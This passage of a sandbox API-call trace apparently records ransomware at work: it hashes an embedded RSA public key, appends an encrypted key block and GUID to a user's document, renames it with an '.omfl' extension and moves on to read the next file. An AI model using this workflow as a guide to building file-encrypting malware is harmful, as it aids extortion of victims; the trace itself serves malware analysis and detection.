KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.019] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.020] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.020] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.020] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.020] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.020] GetLastError () returned 0x0 [0132.021] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.021] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.021] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.021] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.021] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.021] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.022] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x14a51, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.022] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.022] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.022] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.023] CloseHandle (hObject=0x610) returned 1 [0132.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f82a0 [0132.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0132.024] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\W5rIjvHFFgw34_o1.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\w5rijvhffgw34_o1.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\W5rIjvHFFgw34_o1.odp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\w5rijvhffgw34_o1.odp.omfl")) returned 1 [0132.026] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e1411e0, ftCreationTime.dwHighDateTime=0x1d5da24, ftLastAccessTime.dwLowDateTime=0x32643690, ftLastAccessTime.dwHighDateTime=0x1d5e00e, ftLastWriteTime.dwLowDateTime=0x32643690, ftLastWriteTime.dwHighDateTime=0x1d5e00e, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjcbq7jIuq-w.odp", cAlternateFileName="YJCBQ7~1.ODP")) returned 1 [0132.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.026] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0132.027] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\yjcbq7jIuq-w.odp") returned=".odp" [0132.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aFM0SjkBF-UdBxYLzMZ\\yjcbq7jIuq-w.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\afm0sjkbf-udbxylzmz\\yjcbq7jiuq-w.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.027] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=16771) returned 1 [0132.027] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.030] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x415d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.030] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.031] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.031] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x4183, lpOverlapped=0x0) returned 1 [0132.031] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.031] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.031] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.031] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.031] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.033] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.033] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.033] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.033] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.033] GetLastError () returned 0x0 [0132.033] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.033] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.033] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.033] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.033] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4180) returned 0xdd2f688 [0132.033] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.033] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.033] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49db958 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17340 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49db9a0 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17358 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17388 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd173a0 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.034] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17388 | out: hHeap=0x4970000) returned 1 [0132.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.034] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173a0 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17388 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.034] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17388 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.035] GetCurrentThreadId () returned 0x618 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579680 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.035] GetCurrentThreadId () returned 0x618 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17388 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173a0 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.036] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17370 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd173b8 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17388 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17388 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.037] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17388 | out: hHeap=0x4970000) returned 1 [0132.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.038] HeapFree 